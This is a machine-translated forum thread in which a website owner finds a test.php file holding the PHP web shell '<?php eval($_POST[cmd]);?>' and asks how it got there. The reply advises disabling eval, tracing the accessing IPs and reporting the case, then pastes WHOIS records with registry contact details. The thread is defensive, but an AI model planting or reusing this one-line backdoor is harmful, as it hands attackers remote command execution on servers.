The php vulnerability is urgent... we do not know how to add test. php content to our website: & lt ;? Phpeval ($ _ POST [cmd]);? & Gt; I found a lot of information and didn't see a rough picture .. 1. I want to know how this is generally injected into our website ?? 2. What role does it play? Php vulnerability inquiry ....
We do not know how to add test. php to our website.
The content is as follows:
I found a lot of information and I didn't see a rough idea ..
1. I want to know how this is generally injected into our website ??
2. What role does it play ??
Other original files on our website should not be injected too...
------ Solution --------------------
1. first, disable the eval function in php. ini (check whether this function is not used in the system-this function is rarely used in common systems)
2. search for all IP addresses that access test. php.
Collect the information and report the case.
BatchFile code
inetnum: 222.32.0.0 - 222.63.255.255netname: CRTCdescr: CHINA RAILWAY TELECOMMUNICATIONS CENTERdescr: 22F Yuetan Mansion,Xicheng District,Beijing,P.R.Chinacountry: CNadmin-c: LQ112-APtech-c: LM273-APstatus: ALLOCATED PORTABLEmnt-by: MAINT-CNNIC-APchanged: hm-changed@apnic.net 20030902source: APNICroute: 222.32.0.0/11descr: CHINA RAILWAY TELECOMMUNICATIONS CENTERcountry: CNorigin: AS9394mnt-by: MAINT-CN-CRTCchanged: ipas@cnnic.cn 20040402source: APNICperson: LV QIANGnic-hdl: LQ112-APe-mail: crnet_mgr@chinatietong.comaddress: 22F Yuetan Mansion,Xicheng District,Beijing,P.R.Chinaphone: +86-10-51892111fax-no: +86-10-51847845country: CNchanged: ipas@cnnic.net.cn 20060911mnt-by: MAINT-CNNIC-APsource: APNICperson: liu minnic-hdl: LM273-APe-mail: crnet_tec@chinatietong.comaddress: 22F Yuetan Mansion,Xicheng District,Beijing,P.R.Chinaphone: +86-10-51848796fax-no: +86-10-51842426country: CNchanged: ipas@cnnic.net.cn 20041208mnt-by: MAINT-CNNIC-APsource: APNICinetnum: 222.32.0.0 - 222.63.255.255netname: CRTCdescr: CHINA RAILWAY TELECOMMUNICATIONS CENTERdescr: 22F Yuetan Mansion,Xicheng District,Beijing,Chinacountry: CNadmin-c: LQ112-CNtech-c: LM273-CNstatus: ALLOCATED PORTABLEchanged: hm-changed@apnic.net 20030902mnt-by: MAINT-CNNIC-APsource: CNNICperson: LV QIANGnic-hdl: LQ112-CNe-mail: crnet_mgr@chinatietong.comaddress: 22F Yuetan Mansion,Xicheng District,Beijingphone: +86-10-51892111fax-no: +86-10-51847845country: CNchanged: ipas@cnnic.cn 20060419mnt-by: MAINT-CNNIC-APsource: CNNICperson: liu minnic-hdl: LM273-CNe-mail: crnet_tec@chinatietong.comaddress: 22F Yuetan Mansion,Xicheng District,Beijing,P.R.Chinaphone: +86-10-51848796fax-no: +86-10-51842426country: CNchanged: ipas@cnnic.net.cn 20041208mnt-by: MAINT-CNNIC-APsource: CNNIC